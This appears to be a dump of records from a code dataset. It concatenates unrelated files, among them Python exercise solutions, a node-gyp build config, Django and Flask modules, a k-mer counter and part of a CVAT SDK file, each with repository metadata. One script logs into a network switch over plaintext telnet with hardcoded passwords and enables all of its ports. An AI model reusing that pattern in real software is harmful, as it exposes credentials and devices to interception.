# Anurag 26 28 30
# Harsh
# Sample Output 1
# 26.50
# solutions:
# solution(1):
if __name__ == '__main__':
n = int(input())
student_marks = {}
for _ in range(n):
name, *line = input().split()
scores = list(map(float, line))
student_marks[name] = scores
query_name = input()
result = student_marks[query_name]
print('{0:.2f}'.format(sum(result)/len(result)))
# solution(2):
marks = {}
for _ in range(int(input())):
line = input().split()
marks[line[0]] = list(map(float, line[1:]))
print('%.2f' %(sum(marks[input()])/3))
|
[
"towfeeqpandith@gmail.com"
] |
towfeeqpandith@gmail.com
|
04b01957fe6d7f618c2f1fcb9e8494f21ae08e21
|
bf0f5c9d5e25bb914e85e554e25a5aafac99190b
|
/node_modules/watchpack-chokidar2/node_modules/fsevents/build/config.gypi
|
49706aafc965e4f438ddeb0c5230a0c7523f61ca
|
[
"MIT"
] |
permissive
|
Rambeur/ecom
|
08c34b4431cca2f4344be4cc62f001b59c5415ad
|
f934ccbd99d0291c495b3c211a38b678b31fdb7f
|
refs/heads/master
| 2023-01-02T01:01:24.685910
| 2020-10-25T18:26:07
| 2020-10-25T18:26:07
| 307,163,812
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,586
|
gypi
|
# Do not edit. File was generated by node-gyp's "configure" step
{
"target_defaults": {
"cflags": [],
"default_configuration": "Release",
"defines": [],
"include_dirs": [],
"libraries": []
},
"variables": {
"asan": 0,
"build_v8_with_gn": "false",
"coverage": "false",
"dcheck_always_on": 0,
"debug_nghttp2": "false",
"debug_node": "false",
"enable_lto": "false",
"enable_pgo_generate": "false",
"enable_pgo_use": "false",
"error_on_warn": "false",
"force_dynamic_crt": 0,
"host_arch": "x64",
"icu_gyp_path": "tools/icu/icu-system.gyp",
"icu_small": "false",
"icu_ver_major": "67",
"is_debug": 0,
"llvm_version": "12.0",
"napi_build_version": "7",
"node_byteorder": "little",
"node_debug_lib": "false",
"node_enable_d8": "false",
"node_install_npm": "false",
"node_module_version": 83,
"node_no_browser_globals": "false",
"node_prefix": "/usr/local/Cellar/node/14.13.0",
"node_release_urlbase": "",
"node_shared": "false",
"node_shared_brotli": "false",
"node_shared_cares": "false",
"node_shared_http_parser": "false",
"node_shared_libuv": "false",
"node_shared_nghttp2": "false",
"node_shared_openssl": "false",
"node_shared_zlib": "false",
"node_tag": "",
"node_target_type": "executable",
"node_use_bundled_v8": "true",
"node_use_dtrace": "true",
"node_use_etw": "false",
"node_use_node_code_cache": "true",
"node_use_node_snapshot": "true",
"node_use_openssl": "true",
"node_use_v8_platform": "true",
"node_with_ltcg": "false",
"node_without_node_options": "false",
"openssl_fips": "",
"openssl_is_fips": "false",
"ossfuzz": "false",
"shlib_suffix": "83.dylib",
"target_arch": "x64",
"v8_enable_31bit_smis_on_64bit_arch": 0,
"v8_enable_gdbjit": 0,
"v8_enable_i18n_support": 1,
"v8_enable_inspector": 1,
"v8_enable_lite_mode": 0,
"v8_enable_object_print": 1,
"v8_enable_pointer_compression": 0,
"v8_no_strict_aliasing": 1,
"v8_optimized_debug": 1,
"v8_promise_internal_field_count": 1,
"v8_random_seed": 0,
"v8_trace_maps": 0,
"v8_use_siphash": 1,
"want_separate_host_toolset": 0,
"xcode_version": "12.0",
"nodedir": "/Users/ilyesta/Library/Caches/node-gyp/14.13.0",
"standalone_static_library": 1,
"dry_run": "",
"legacy_bundling": "",
"save_dev": "",
"browser": "",
"commit_hooks": "true",
"only": "",
"viewer": "man",
"also": "",
"rollback": "true",
"sign_git_commit": "",
"audit": "true",
"usage": "",
"globalignorefile": "/usr/local/etc/npmignore",
"init_author_url": "",
"maxsockets": "50",
"shell": "/bin/zsh",
"metrics_registry": "https://registry.npmjs.org/",
"parseable": "",
"shrinkwrap": "true",
"init_license": "ISC",
"timing": "",
"if_present": "",
"cache_max": "Infinity",
"init_author_email": "",
"sign_git_tag": "",
"cert": "",
"git_tag_version": "true",
"local_address": "",
"long": "",
"preid": "",
"registry": "https://registry.npmjs.org/",
"fetch_retries": "2",
"key": "",
"message": "%s",
"versions": "",
"globalconfig": "/usr/local/etc/npmrc",
"always_auth": "",
"logs_max": "10",
"prefer_online": "",
"cache_lock_retries": "10",
"global_style": "",
"update_notifier": "true",
"audit_level": "low",
"heading": "npm",
"fetch_retry_mintimeout": "10000",
"offline": "",
"read_only": "",
"searchlimit": "20",
"access": "",
"json": "",
"allow_same_version": "",
"description": "true",
"engine_strict": "",
"https_proxy": "",
"init_module": "/Users/ilyesta/.npm-init.js",
"userconfig": "/Users/ilyesta/.npmrc",
"cidr": "",
"node_version": "14.13.0",
"user": "",
"auth_type": "legacy",
"editor": "vi",
"ignore_prepublish": "",
"save": "true",
"script_shell": "",
"tag": "latest",
"before": "",
"global": "",
"progress": "true",
"ham_it_up": "",
"optional": "true",
"searchstaleness": "900",
"bin_links": "true",
"force": "",
"save_prod": "",
"searchopts": "",
"depth": "Infinity",
"node_gyp": "/usr/local/lib/node_modules/npm/node_modules/node-gyp/bin/node-gyp.js",
"rebuild_bundle": "true",
"sso_poll_frequency": "500",
"unicode": "true",
"fetch_retry_maxtimeout": "60000",
"ca": "",
"save_prefix": "^",
"scripts_prepend_node_path": "warn-only",
"sso_type": "oauth",
"strict_ssl": "true",
"tag_version_prefix": "v",
"dev": "",
"fetch_retry_factor": "10",
"group": "20",
"save_exact": "",
"cache_lock_stale": "60000",
"prefer_offline": "",
"version": "",
"cache_min": "10",
"otp": "",
"cache": "/Users/ilyesta/.npm",
"searchexclude": "",
"color": "true",
"package_lock": "true",
"fund": "true",
"package_lock_only": "",
"save_optional": "",
"user_agent": "npm/6.14.8 node/v14.13.0 darwin x64",
"ignore_scripts": "",
"cache_lock_wait": "10000",
"production": "",
"save_bundle": "",
"send_metrics": "",
"init_version": "1.0.0",
"node_options": "",
"umask": "0022",
"scope": "",
"git": "git",
"init_author_name": "",
"onload_script": "",
"tmp": "/var/folders/vz/s9x6prmd6wx2n9r5xdcmfpcr0000gp/T",
"unsafe_perm": "true",
"prefix": "/usr/local",
"format_package_lock": "true",
"link": ""
}
}
|
[
"ilyesta@tv.home"
] |
ilyesta@tv.home
|
1b428c6ad3ee2b764e07fa843b655e12c297c4ea
|
ec8de5a02d21039378b3ec2ad6fedaa19a687848
|
/wedding-api/wsgi.py
|
f99079dfcd6bc184960f72d6001b854538b1056b
|
[] |
no_license
|
jmteachw/wedding-api
|
5ab3e57a0c9a472153bf6363f8cfe3f2481213bb
|
a54a984a6814ac15391c4a3bf4db370a452cab9d
|
refs/heads/master
| 2021-01-12T07:48:14.209675
| 2017-01-18T06:50:20
| 2017-01-18T06:50:20
| 77,021,904
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 403
|
py
|
"""
WSGI config for wedding-website project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "wedding-api.settings")
application = get_wsgi_application()
|
[
"jmteachw@gmail.com"
] |
jmteachw@gmail.com
|
def49f0d082ac8dd74588d5dc0c9db9abd6c2ae3
|
cc24b10be9777e468a1f28fed3a31c69c196be75
|
/noShut.py
|
6eca8c0fa702765fe29eb0d26c358831d165d94c
|
[] |
no_license
|
aragon217/FYP2
|
96e0b50cd7eabcdc1d4e092fc79e3c69d569a33c
|
a6c3530c7096e46eb32aa4f89cafe443e5dc5c6f
|
refs/heads/master
| 2022-09-08T02:58:05.539589
| 2020-05-31T05:25:47
| 2020-05-31T05:25:47
| 268,211,119
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 431
|
py
|
import telnetlib
HOST = "192.168.0.253"
user = "openmsa"
password = "openmsa"
tn = telnetlib.Telnet(HOST)
tn.read_until("Username: ")
tn.write(user + "\n")
if password:
tn.read_until("Password: ")
tn.write(password + "\n")
tn.write("enable\n")
tn.write("openmsa\n")
tn.write("conf t\n")
tn.write("int range f0/1-48\n")
tn.write("no shutdown\n")
tn.write("end\n")
tn.write("exit\n")
output2 = tn.read_all()
print output2
|
[
"noreply@github.com"
] |
aragon217.noreply@github.com
|
ac1e65d6ba22327dfbba49ea03abaa36615b3d8c
|
71e5024bc713ff00cd844c6ddfd077facaf3b4b9
|
/bin/rst2pseudoxml.py
|
875e97baaba33c562eddd23c147e0d64d87a0e00
|
[] |
no_license
|
jonathanbglass/cloudauditor
|
a3fb11d418ec6a081950e51b5c8235aafb6e7f78
|
af8785d706769c0e91d95fbb2669784ed12c14bd
|
refs/heads/master
| 2022-08-20T00:56:08.631504
| 2022-08-01T18:53:01
| 2022-08-01T18:53:01
| 118,145,645
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 648
|
py
|
#!/Users/jonathanglass/Documents/GitHub/cloud-auditor/bin/python3
# $Id: rst2pseudoxml.py 4564 2006-05-21 20:44:42Z wiemann $
# Author: David Goodger <goodger@python.org>
# Copyright: This module has been placed in the public domain.
"""
A minimal front end to the Docutils Publisher, producing pseudo-XML.
"""
try:
import locale
locale.setlocale(locale.LC_ALL, '')
except:
pass
from docutils.core import publish_cmdline, default_description
description = ('Generates pseudo-XML from standalone reStructuredText '
'sources (for testing purposes). ' + default_description)
publish_cmdline(description=description)
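# Illustrative invocation (file names are hypothetical), following the usual
# docutils front-end convention:
#   python rst2pseudoxml.py input.rst output.txt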
|
[
"jonathan.glass@gmail.com"
] |
jonathan.glass@gmail.com
|
0c1fb16b5f3f3ba3bb88adf40b93e17a430c3e47
|
1bedf297e77b78a43fa375eb11651620b009941b
|
/liumin_kmer_counting.py
|
aa3eacdf7a1b33b4a243dfb58ef298e13a51f971
|
[] |
no_license
|
JM-SONG/CommonScript
|
28ee9a2cde8bcc91a884b526e6150bb8cc40df8a
|
d4ba0a7495b7b34d2348a1454bf724dbb5d8a00c
|
refs/heads/master
| 2022-12-05T00:31:29.783959
| 2020-08-25T01:05:36
| 2020-08-25T01:05:36
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,565
|
py
|
#!/usr/bin/python
"""
disk limit = 200 MB && memory limit = 1 MB
how to run this program: python liumin_kmer_counting.py inputfile > outputfile
I don't know how to calculate the time and space complexity.
The memory usage is about 8 MB,
a little higher than your requirement of 1 MB.
"""
import os
import re
import time
from sys import argv
from itertools import islice
from memory_profiler import profile
####input data and calculate nlist,nsublist
infile=open(argv[1],'r')
line=infile.readline()
(k,n,q)=line.strip().split()
nl=2*int(k)*int(n)/(200*10**6)+1
ns=int(200*(2*int(k)+32)/(0.7*2*int(k)))+1
###define dicta,dictb for seq and binary convert
dicta={'a' : '00',
'c' : '01',
'g' : '10',
't' : '11',
}
dictb=dict(map(lambda t:(t[1],t[0]), dicta.items()))
def seq_to_binary(sequence):
base=list(sequence)
binary=''
for char in base:
binary="".join([binary,dicta[char]])
return binary
def binary_to_sequence(binary):
bin_list=re.findall('.{2}',binary)
sequence=''
for char in bin_list:
sequence="".join([sequence,dictb[char]])
return sequence
@profile
###jellyfish algorithm: kmer-counting and hashEntry
def kmer_counting(sublist):
H={}
count={}
for kmer in sublist:
kmer=kmer.strip()
i=hashEntry(kmer,H)
if i in H:
count[i]+=1
else:
H[i]=kmer
count[i]=1
return H,count
def hashEntry(kmer,H):
i=int(kmer,2)%7
while i in H and H[i] != kmer:
i = (i+1)%7;
return i
####DSK algorithm and output count
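# (As implemented below: pass i routes each k-mer to one of nl disk
# partitions by hash, each partition is split into ns temp files small
# enough for memory, and every temp file is then counted in RAM with the
# hash table above -- the disk-partitioning idea behind DSK.)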
for i in range(0,nl):
for line in islice(infile,0,None):
kmer=line.strip()
if kmer != '' and kmer.find('n') < 0:
if int(seq_to_binary(kmer),2)%nl == i:
j=(int(seq_to_binary(kmer),2)/nl)%ns
f=open('tempfile'+str(i)+str(j)+'.txt','a+')
f.write(seq_to_binary(kmer)+'\n')
f.close()
for j in range (0,ns):
if os.path.exists('tempfile'+str(i)+str(j)+'.txt'):
temp=open('tempfile'+str(i)+str(j)+'.txt','r')
sublist=temp.readlines()
(H,count)=kmer_counting(sublist)
for char in H:
if count[char] >= int(q):
print str(count[char])+' '+binary_to_sequence(H[char])
temp.close()
os.remove('tempfile'+str(i)+str(j)+'.txt')
print time.clock()
infile.close()
|
[
"noreply@github.com"
] |
JM-SONG.noreply@github.com
|
3e0338ea79cadaaa033b19f89912a98516766a16
|
47c9aa780be7a08acf40eb24d72b8c801251692b
|
/rango1/urls.py
|
72a7a6df9f9ef9d9f707c791d59efe330d35e6e6
|
[] |
no_license
|
rashmigj/tango_with_django
|
3643323bd713325ec63c93267cfc4ffa78f84083
|
2d510f124aa91bd32690d29a001d029199c85a13
|
refs/heads/master
| 2016-09-05T22:22:47.940730
| 2015-01-04T15:04:04
| 2015-01-04T15:04:04
| 28,739,606
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 189
|
py
|
from django.conf.urls import patterns, url
from rango1 import views
urlpatterns = patterns('',
    url(r'^$', views.index, name='index'),
    url(r'^about/$', views.about, name='about'))
|
[
"grashmi033@gmail.com"
] |
grashmi033@gmail.com
|
f4cee504154a3351775c06de6e22a4212988559f
|
33a50bb13812090a36257078522b798762978c66
|
/cron/test_shell.py
|
9a9c93cabc353d977c3d9190769ca1f8e911b557
|
[] |
no_license
|
aa3632840/quanlin
|
52ac862073608cd5b977769c14a7f6dcfb556678
|
2890d35fa87367d77e295009f2d911d4b9b56761
|
refs/heads/master
| 2021-01-10T22:05:14.076949
| 2014-10-25T02:28:15
| 2014-10-25T02:28:15
| 23,178,087
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 455
|
py
|
from django_cron import CronJobBase, Schedule
from django.utils import timezone
class MyCronJob(CronJobBase):
    RUN_EVERY_MINS = 0.01  # roughly every 0.6 seconds
MIN_NUM_FAILURES = 1
schedule = Schedule(run_every_mins=RUN_EVERY_MINS)
code = 'cron.my_cron_job' # a unique code
def do(self):
cur_time = timezone.datetime.now()
        print(cur_time)
# open('orcn.job','a').write(cur_time)
# pass # do your thing here
|
[
"262708239@qq.com"
] |
262708239@qq.com
|
b03101e01ea2f609fc8ed3698be1e5a1f2bd4d05
|
5650fa4c2fc3d1758f942695e2fb16d41fb29729
|
/build/env/bin/avro
|
0ba2ade604e38488f27440b86c727e60b000bd16
|
[] |
no_license
|
2CloudMan/cloudbim
|
9c0453bf06488c19d76559d0c49e7379cca41408
|
9cb19ace35fa4eefd0be022aa81d2f9d8741b801
|
refs/heads/master
| 2021-01-18T20:21:45.964969
| 2015-06-05T10:42:55
| 2015-06-05T10:42:55
| 32,972,220
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 201
|
#!/home/linmiancheng/workplace/hue/build/env/bin/python2.7
# EASY-INSTALL-SCRIPT: 'avro==1.7.6','avro'
__requires__ = 'avro==1.7.6'
import pkg_resources
pkg_resources.run_script('avro==1.7.6', 'avro')
|
[
"linmiancheng@gmail.com"
] |
linmiancheng@gmail.com
|
|
a54520cdd4fddc633ac22c39ffd1aa72ee4c1608
|
e0c54f49f06d012a646c2d697407799246621193
|
/data/parsers/reqparse.py
|
76ce74c8fc0ab0bd8e3870085e04427ae4d118dc
|
[] |
no_license
|
PereverzevIvan/WEB.-REST-API.-Flask-restful
|
f27a672d323be2b8c5f69e0ce4f1c9a707ed5f38
|
6532526cff999ea5b268ed5c11dce8cf10b13f48
|
refs/heads/master
| 2023-04-14T13:18:20.272670
| 2021-04-25T07:06:35
| 2021-04-25T07:06:35
| 361,356,046
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 338
|
py
|
from flask_restful import reqparse, inputs

parser = reqparse.RequestParser()
parser.add_argument('title', required=True)
parser.add_argument('content', required=True)
# type=bool would coerce any non-empty string to True; inputs.boolean parses
# "true"/"false" values as intended
parser.add_argument('is_private', required=True, type=inputs.boolean)
parser.add_argument('is_published', required=True, type=inputs.boolean)
parser.add_argument('user_id', required=True, type=int)
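# Hypothetical usage sketch (not part of the original module): the parser is
# typically consumed inside a flask_restful Resource, e.g.
#
#     from flask_restful import Resource
#
#     class NewsList(Resource):
#         def post(self):
#             args = parser.parse_args()  # responds 400 on missing/bad fields
#             ...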
|
[
"peregh320@gmail.com"
] |
peregh320@gmail.com
|
9abe33a607c5ae88af71aa7a742d0b3f593e3597
|
1719920a92f7194766624474b98d59ef8d6eddaf
|
/models/media_content_rating_france.py
|
8675202caaa97ccbeaea25f8787eb1a16fa455e4
|
[
"MIT"
] |
permissive
|
MIchaelMainer/msgraph-v10-models-python
|
cfa5e3a65ba675383975a99779763211ed9fa0a9
|
adad66363ebe151be2332f3ef74a664584385748
|
refs/heads/master
| 2020-03-19T12:51:06.370673
| 2018-06-08T00:16:12
| 2018-06-08T00:16:12
| 136,544,573
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,116
|
py
|
# -*- coding: utf-8 -*-
'''
# Copyright (c) Microsoft Corporation. All Rights Reserved. Licensed under the MIT License. See License in the project root for license information.
#
# This file was generated and any changes will be overwritten.
'''
from __future__ import unicode_literals
from ..model.rating_france_movies_type import RatingFranceMoviesType
from ..model.rating_france_television_type import RatingFranceTelevisionType
from ..one_drive_object_base import OneDriveObjectBase
class MediaContentRatingFrance(OneDriveObjectBase):
def __init__(self, prop_dict={}):
self._prop_dict = prop_dict
@property
def movie_rating(self):
"""
Gets and sets the movieRating
Returns:
:class:`RatingFranceMoviesType<onedrivesdk.model.rating_france_movies_type.RatingFranceMoviesType>`:
The movieRating
"""
if "movieRating" in self._prop_dict:
if isinstance(self._prop_dict["movieRating"], OneDriveObjectBase):
return self._prop_dict["movieRating"]
            else:
self._prop_dict["movieRating"] = RatingFranceMoviesType(self._prop_dict["movieRating"])
return self._prop_dict["movieRating"]
return None
@movie_rating.setter
def movie_rating(self, val):
self._prop_dict["movieRating"] = val
@property
def tv_rating(self):
"""
Gets and sets the tvRating
Returns:
:class:`RatingFranceTelevisionType<onedrivesdk.model.rating_france_television_type.RatingFranceTelevisionType>`:
The tvRating
"""
if "tvRating" in self._prop_dict:
if isinstance(self._prop_dict["tvRating"], OneDriveObjectBase):
return self._prop_dict["tvRating"]
            else:
self._prop_dict["tvRating"] = RatingFranceTelevisionType(self._prop_dict["tvRating"])
return self._prop_dict["tvRating"]
return None
@tv_rating.setter
def tv_rating(self, val):
self._prop_dict["tvRating"] = val
|
[
"mmainer@microsoft.com"
] |
mmainer@microsoft.com
|
2e672049167250d9c0ec7bb4b0659a8991fb65f1
|
565548ff49844ed69ae16d5104e500f01c973402
|
/app/public/__init__.py
|
4bff15b2e7e74f5ac529b2953da9c4906c389912
|
[] |
no_license
|
jaisenbe58r/Pebrassos
|
159ce5a8b372590fd9368d9b5b3c1b0513895bba
|
7516a1f7bbba78547af86a9858ee381224964d28
|
refs/heads/master
| 2023-02-27T05:42:50.652697
| 2021-01-31T20:57:59
| 2021-01-31T20:57:59
| 299,698,630
| 3
| 1
| null | 2021-01-31T20:58:01
| 2020-09-29T18:04:36
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 389
|
py
|
"""Copyright (c) 2020 Jaime Sendra Berenguer & Carlos Mahiques Ballester
Pebrassos - Machine Learning Library Extensions
Author:Jaime Sendra Berenguer & Carlos Mahiques Ballester
<www.linkedin.com/in/jaisenbe>
License: MIT
CREATION DATE: 24/05/2019
"""
from flask import Blueprint
public_bp = Blueprint('public', __name__, template_folder='templates')
from . import routes
|
[
"jsendra@autis.es"
] |
jsendra@autis.es
|
bb3a596fe8a8d6301b6a67454377963e4c115404
|
daf916c1bf36798163dcae61c9ac6632ff698d1e
|
/그래프/6087.py
|
d683ddd93310c7caf7985368cc36124710715798
|
[] |
no_license
|
Chockchockhancookie/Algorithm
|
c9175163cb2f135a869a43ccb4c084f96fb4a112
|
7c50352349cabf5a89d15fb354ffd9d6967764c0
|
refs/heads/master
| 2023-08-14T01:00:25.755088
| 2021-09-14T14:41:35
| 2021-09-14T14:41:35
| 375,382,867
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,616
|
py
|
from collections import deque
import sys
input = sys.stdin.readline
INF = int(1e9)
def bfs(x, y):
distance = [[INF] * m for _ in range(n)]
distance[x][y] = 0
queue = deque()
queue.append((x, y, 9, 0))
while queue:
a, b, direct, count = queue.popleft()
for i in range(4):
nx = a + dx[i]
ny = b + dy[i]
if 0 <= nx < n and 0 <= ny < m and graph[nx][ny] != "*":
if i != direct:
if direct == 9:
cost = count
if cost <= distance[nx][ny]:
distance[nx][ny] = cost
queue.append((nx, ny, i, cost))
cost = count + 1
if cost <= distance[nx][ny]:
distance[nx][ny] = cost
queue.append((nx, ny, i, cost))
else:
cost = count
if cost <= distance[nx][ny]:
distance[nx][ny] = cost
queue.append((nx, ny, i, cost))
return distance
m, n = map(int, input().split())
start_x, start_y = -1, -1
end_x, end_y = -1, -1
graph = []
for i in range(n):
tmp = list(input().rstrip())
graph.append(tmp)
for j in range(m):
if tmp[j] == "C":
if start_x == -1:
start_x, start_y = i, j
else:
end_x, end_y = i, j
dx = [1, 0, -1, 0]
dy = [0, -1, 0, 1]
answer = bfs(start_x, start_y)
if answer[end_x][end_y] == INF:
print(0)
else:
print(answer[end_x][end_y])
|
[
"mellow3632@naver.com"
] |
mellow3632@naver.com
|
d4485078cbfce8f4b623cb39389f6e95a6c819a9
|
2b32e6768855670b0f063ae489259b141b154174
|
/products/views.py
|
2ce82b4459ea658e679973334b5e5a2c06e392ef
|
[] |
no_license
|
mahinm20/Product-Hunt-Clone
|
22f749316f56f813f98e078b3f17769234cbecf0
|
1e1a848537f38fa80d484eb59d923387d3c585f5
|
refs/heads/master
| 2021-05-26T11:31:43.887425
| 2020-04-08T14:56:01
| 2020-04-08T14:56:01
| 254,114,222
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,895
|
py
|
from django.shortcuts import render, redirect, get_object_or_404
from django.contrib.auth.decorators import login_required
from .models import Product
from django.utils import timezone
# Create your views here.
def home(request):
products= Product.objects
return render(request,'products/home.html',{'products':products})
""" @login_required
def create(request):
if request.method == 'POST':
if request.POST['title'] and request.POST['body'] and request.POST['url'] and request.FILES['icon'] and request.FILES['images']:
product = Product()
product.body = request.POST['body']
product.title = request.POST['title']
if request.POST['url'].startswith('http://') or request.POST['url'].startswith('https://'):
product.url = request.POST['url']
else:
product.url = 'http://' + request.POST['url']
product.icon = request.FILES['icon']
product.image = request.FILES['images']
product.pub_date = timezone.datetime.now()
product.hunter = request.user
product.save()
return redirect('home')
else:
return render(request,'products/create.html',{'error':'All fields are required!'})
return render(request,'products/create.html') """
@login_required(login_url='/accounts/signup')
def create(request):
if request.method == 'POST':
if request.POST['title'] and request.POST['body'] and request.POST['url'] and request.FILES['icon'] and request.FILES['image']:
product = Product()
product.title = request.POST['title']
product.body = request.POST['body']
if request.POST['url'].startswith('http://') or request.POST['url'].startswith('https://'):
product.url = request.POST['url']
else:
product.url = 'http://' + request.POST['url']
product.icon = request.FILES['icon']
product.image = request.FILES['image']
product.pub_date = timezone.datetime.now()
product.hunter = request.user
product.save()
return redirect('/products/' + str(product.id))
#return redirect('home')
else:
return render(request, 'products/create.html',{'error':'All fields are required.'})
else:
return render(request, 'products/create.html')
def detail(request,product_id):
product=get_object_or_404(Product,pk=product_id)
return render(request,'products/detail.html',{'product':product})
@login_required(login_url='/accounts/signup')
def upvote(request,product_id):
if request.method == 'POST':
product=get_object_or_404(Product,pk=product_id)
product.total_votes +=1
product.save()
return redirect('/products/' + str(product.id))
|
[
"mahinmalhotra20@gmail.com"
] |
mahinmalhotra20@gmail.com
|
de9ac930786b7d2b59650281ba254b3487f336a7
|
dce4dc9a1901e70a762af3fc29e977bd90f7fb43
|
/src/readfiletest.py
|
9eebc80701a2484c1078e7383a4760c4da116dbc
|
[] |
no_license
|
helenahilander/data-visualization-gui
|
1d39d5819b8ff70640db82f9dbc1ce710e2f7029
|
484cacb05c01cb4e3d66861533bc2bef785ccb39
|
refs/heads/master
| 2020-09-07T00:55:10.716957
| 2019-11-13T10:14:05
| 2019-11-13T10:14:05
| 220,608,565
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,905
|
py
|
"""
The module explained:
readfiletest.py is a module for testing the ReadFile class with invalid file formats.
"""
import unittest
from io import StringIO
from datareadingerror import DataReadingError
from readfile import ReadFile
class Test(unittest.TestCase):
#testing with a header without #
    #testing that DataReadingError is raised with an invalid file
def test_1(self):
self.input_file = StringIO()
self.input_file.write(' data1\n')
self.input_file.write('x,y\n#float,float\n')
self.input_file.write('-1.69,0.21\n-0.80,0.95\n-0.41,1.87\n-0.14,2.16\n-0.13,-0.97\n0.42,-0.30')
self.input_file.write('-0.92,-0.61\n0.66,0.41\n')
self.input_file.seek(0, 0)
data_list = None
with self.assertRaises(DataReadingError):
data_list = ReadFile.create_data_objects( self.input_file)
self.input_file.close()
    #testing with an invalid #x_name,y_name row
    #testing that DataReadingError is raised with an invalid file
def test_2(self):
self.input_file = StringIO()
self.input_file.write('#data1\n')
self.input_file.write('x,y\n#float,float\n')
self.input_file.write('-1.69,0.21\n-0.80,0.95\n-0.41,1.87\n-0.14,2.16\n-0.13,-0.97\n0.42,-0.30')
self.input_file.write('-0.92,-0.61\n0.66,0.41\n')
self.input_file.seek(0, 0)
data_list = None
with self.assertRaises(DataReadingError):
data_list = ReadFile.create_data_objects(self.input_file)
self.input_file.close()
    #testing with an invalid #x_type, y_type row
    #testing that DataReadingError is raised with an invalid file
def test_3(self):
self.input_file = StringIO()
self.input_file.write('#data1\n')
self.input_file.write('#x,y\nfloat,float\n')
self.input_file.write('-1.69,0.21\n-0.80,0.95\n-0.41,1.87\n-0.14,2.16\n-0.13,-0.97\n0.42,-0.30')
self.input_file.write('-0.92,-0.61\n0.66,0.41\n')
self.input_file.seek(0, 0)
data_list = None
with self.assertRaises(DataReadingError):
data_list = ReadFile.create_data_objects(self.input_file)
self.input_file.close()
    #testing with an invalid #x_name
    #testing that DataReadingError is raised with an invalid file
def test_4(self):
self.input_file = StringIO()
self.input_file.write('#data1\n')
self.input_file.write('x\n#float\n')
self.input_file.seek(0, 0)
data_list = None
with self.assertRaises(DataReadingError):
data_list = ReadFile.create_data_objects(self.input_file)
self.input_file.close()
#invalid data_type with x data
#testing that DataReadingError is raised with invalid file
def test_5(self):
self.input_file = StringIO()
self.input_file.write('#data1\n')
self.input_file.write('#x\nfloat\n')
self.input_file.seek(0, 0)
data_list = None
with self.assertRaises(DataReadingError):
data_list = ReadFile.create_data_objects(self.input_file)
self.input_file.close()
#tests if the created Data object has right attributes
def test_6(self):
self.input_file = StringIO()
self.input_file.write('#data1\n')
self.input_file.write('#x,y\n#float,float\n')
self.input_file.write('-1.69,0.21\n-0.80,0.95\n-0.41,1.87\n-0.14,2.16\n-0.13,-0.97\n0.42,-0.30\n')
self.input_file.write('-0.92,-0.61\n0.66,0.41\n')
self.input_file.seek(0, 0)
data_list = None
data_list = ReadFile.create_data_objects(self.input_file)
self.input_file.close()
self.assertEqual( data_list[0].data_length, 8)
self.assertEqual(data_list[0].x_name, "x")
self.assertEqual(data_list[0].y_name, "y")
self.assertEqual(data_list[0].number_of_decimals, 2)
self.assertEqual( data_list[0].data_type, "doublenum")
self.assertEqual( data_list[0].data_title, "data1")
self.assertEqual(type(data_list[0].x[1]), type(0.2))
self.assertEqual(type(data_list[0].y[1]), type(0.2))
if __name__ == '__main__':
unittest.main()
|
[
"noreply@github.com"
] |
helenahilander.noreply@github.com
|
07d604687d9869027af164e421711abf029e911e
|
1f71f4e41c6aa789f7f5481bc369b852f9ac8eab
|
/cvat-sdk/cvat_sdk/core/proxies/jobs.py
|
4c6047edf883f80cfa84967319f5e596bb0fdec7
|
[
"MIT",
"LGPL-2.0-or-later",
"GPL-1.0-or-later"
] |
permissive
|
shalevy1/cvat
|
2c7e041fa4c8b9a5166894b3ae5e7c28df5d8ae3
|
912e47e56c772eb6c2fb5b32f898b029a985fdfc
|
refs/heads/develop
| 2023-02-13T23:05:15.428038
| 2023-02-08T16:08:52
| 2023-02-08T16:08:52
| 200,596,810
| 0
| 0
|
MIT
| 2023-01-27T08:48:21
| 2019-08-05T06:39:24
|
TypeScript
|
UTF-8
|
Python
| false
| false
| 5,516
|
py
|
# Copyright (C) 2022-2023 CVAT.ai Corporation
#
# SPDX-License-Identifier: MIT
from __future__ import annotations
import io
import mimetypes
from pathlib import Path
from typing import TYPE_CHECKING, List, Optional, Sequence
from PIL import Image
from cvat_sdk.api_client import apis, models
from cvat_sdk.core.downloading import Downloader
from cvat_sdk.core.helpers import get_paginated_collection
from cvat_sdk.core.progress import ProgressReporter
from cvat_sdk.core.proxies.annotations import AnnotationCrudMixin
from cvat_sdk.core.proxies.issues import Issue
from cvat_sdk.core.proxies.model_proxy import (
ModelListMixin,
ModelRetrieveMixin,
ModelUpdateMixin,
build_model_bases,
)
from cvat_sdk.core.uploading import AnnotationUploader
if TYPE_CHECKING:
from _typeshed import StrPath
_JobEntityBase, _JobRepoBase = build_model_bases(
models.JobRead, apis.JobsApi, api_member_name="jobs_api"
)
class Job(
models.IJobRead,
_JobEntityBase,
ModelUpdateMixin[models.IPatchedJobWriteRequest],
AnnotationCrudMixin,
):
_model_partial_update_arg = "patched_job_write_request"
_put_annotations_data_param = "job_annotations_update_request"
def import_annotations(
self,
format_name: str,
filename: StrPath,
*,
status_check_period: Optional[int] = None,
pbar: Optional[ProgressReporter] = None,
):
"""
Upload annotations for a job in the specified format (e.g. 'YOLO ZIP 1.0').
"""
filename = Path(filename)
AnnotationUploader(self._client).upload_file_and_wait(
self.api.create_annotations_endpoint,
filename,
format_name,
